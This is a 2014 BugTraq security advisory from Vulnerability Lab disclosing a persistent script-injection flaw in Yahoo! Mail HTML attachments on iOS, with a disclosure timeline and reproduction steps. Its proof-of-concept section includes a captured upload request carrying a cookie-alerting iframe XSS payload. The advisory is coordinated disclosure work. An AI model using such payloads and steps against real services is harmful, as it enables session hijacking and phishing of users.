BugTraq
Yahoo! Bug Bounty #30 YM - Application-Side Mail Encoding (File Attachment) Vulnerability Jul 10 2014 12:51PM
Vulnerability Lab (research vulnerability-lab com)
Document Title:
===============
Yahoo! Bug Bounty #30 YM - Application-Side Mail Encoding (File Attachment) Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1137

Release Date:
=============
2014-07-08

Vulnerability Laboratory ID (VL-ID):
====================================
1137

Common Vulnerability Scoring System:
====================================
5.3

Product & Service Introduction:
===============================
Yahoo! Inc. is an American multinational internet corporation headquartered in Sunnyvale, California. It is widely
known for its web portal, search engine Yahoo! Search, and related services, including Yahoo! Directory, Yahoo! Mail,
Yahoo! News, Yahoo! Finance, Yahoo! Groups, Yahoo! Answers, advertising, online mapping, video sharing, fantasy sports
and its social media website. It is one of the most popular sites in the United States. According to news sources,
roughly 700 million people visit Yahoo! websites every month. Yahoo! itself claims it attracts `more than half a
billion consumers every month in more than 30 languages.

(Copy of the Vendor Homepage: http://www.yahoo.com )

Abstract Advisory Information:
==============================
The Vulnerability-Laboratory Research Team has discovered a persistent input validation vulnerability in the official Yahoo! Mail Service web-application.

Vulnerability Disclosure Timeline:
==================================
2013-11-08: Researcher Notification & Coordination (Ateeq ur Rehman Khan - Core Research Team)
2013-11-09: Vendor Notification (Yahoo! Security Team - Bug Bounty Program)
2014-02-18: Vendor Response/Feedback (Yahoo! Security Team - Bug Bounty Program)
2014-06-01: Vendor Fix/Patch (Yahoo! Developer Team - Reward: HackerOne Program)
2014-07-08: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Yahoo!
Product: Yahoo! Mail - Web Application & API 2013 Q3

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A persistent script code inject web vulnerability has been discovered in the official Yahoo Mail Service web-application & API.
The vulnerability affects the Yahoo Mail Mobile Application for iPhone, iPad and iPod touch. The vulnerability allows attackers
to upload / attach own malicious .html files and send them to other Yahoo users.

During the testing, it was discovered that using Yahoo mail, it is possible to include malicious script code within .html files
and send them as attachments to other users. It seems that the application is not performing proper validation When uploading
user attached files. Upon viewing these attached files from your iphone/ipad device, the malicious script code gets executed
directly hence leaving the victims vulnerable to persistent client side attacks.

The security risk of the persistent web vulnerability is estimated as medium with a cvss (common vulnerability scoring system)
count of 5.3. Exploitation of this vulnerability requires low user interaction. Successful exploitation of this vulnerability
results in persistent phishing, persistent client side redirects, user session hijacking and similar client side attacks.

Request Method(s):
[+] POST

Vulnerable Application(s):
[+] Yahoo! Mail - Web Application

Vulnerable Module(s):
[+] Compose Mail > File Attachments

Vulnerable Parameter(s):
[+] Attach File

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged yahoo web application
account and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information
and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Register an yahoo mail account and login to the account system
2. Open the `compose a New Yahoo email` section
3. Click the `attach file` button in the compose mail section
4. Attach the POC.html file provided along with this advisory
5. Send out the email with the malicious test attachment to another yahoo test account
6. Using your iPad/iPhone device, click on the attachment link of the newly received POC email
7. You should now see an iframe with vulnerability labs website proving the existence of this vulnerability
8. Successful reproduce of the yahoo mail service vulnerability!

--- PoC Session Logs ---
POST /us.f1624.mail.yahoo.com/ya/upload_with_cred?output=php&cred=Encrypted HTTP/1.1
Host: bf1-attach.mail.yahoo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://us-mg6.mail.yahoo.com/neo/launch?.rand=7sd8nun2neu5c
Content-Length: 561
Content-Type: multipart/form-data; boundary=---------------------------234701259230567
Origin: http://us-mg6.mail.yahoo.com
Cookie: Hidden
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------234701259230567
Content-Disposition: form-data; name="filename
POC.html
-----------------------------234701259230567
Content-Disposition: form-data; name="filesize"
120
-----------------------------234701259230567
Content-Disposition: form-data; name="Filedata"; filename="POC.html"
Content-Type: text/html
'%3d'>"><iframe src='http://www.vulnerability-lab.com' onmouseover=alert(document.cookie)></iframe>/927
"><h1>Testing POC Ateeq
-----------------------------234701259230567

Response:
HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: http://us-mg6.mail.yahoo.com
Cache-Control: private
Connection: Keep-Alive
Content-Length: 322
Content-Type: text/xml
Date: Fri, 08 Nov 2013 19:12:53 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi
IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Server: HTTP/1.1 UserFiberFramework/1.0
Vary: Accept-Encoding
Via: HTTP/1.1 r03.ycpi.ac4.yahoo.net UserFiberFramework/1.0

<?xml version="1.0" encoding="UTF-8"?><Response> <attachment> <code>uploadAVNoVirus</code>
<id>e2fd91b75b55018624eef056c5913b0f</id> <name>POC.html</name> <type>text/html</type>
<size>126</size> </attachment></Response><!-- web162405.mail.bf1.yahoo.com compressed/chunked Fri Nov 8 11:12:53 PST 2013

Reference(s):
https://mail.yahoo.com

Solution - Fix & Patch:
=======================
Proper security controls should be implemented/enforced in the file attachment module to validate inputs and to persistent script code executions.

Security Risk:
==============
The security risk of persistent input validation web vulnerability in the yahoo mail service application is estimated as medium.

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq ur Rehman Khan (ateeq (at) evolution-sec (dot) com [email concealed]) [www.vulnerability-lab.com]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin (at) vulnerability-lab (dot) com [email concealed] - research (at) vulnerability-lab (dot) com [email concealed] - admin (at) evolution-sec (dot) com [email concealed]
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin (at) vulnerability-lab (dot) com [email concealed] or research (at) vulnerability-lab (dot) com [email concealed]) to get a permission.

Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research (at) vulnerability-lab (dot) com [email concealed]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus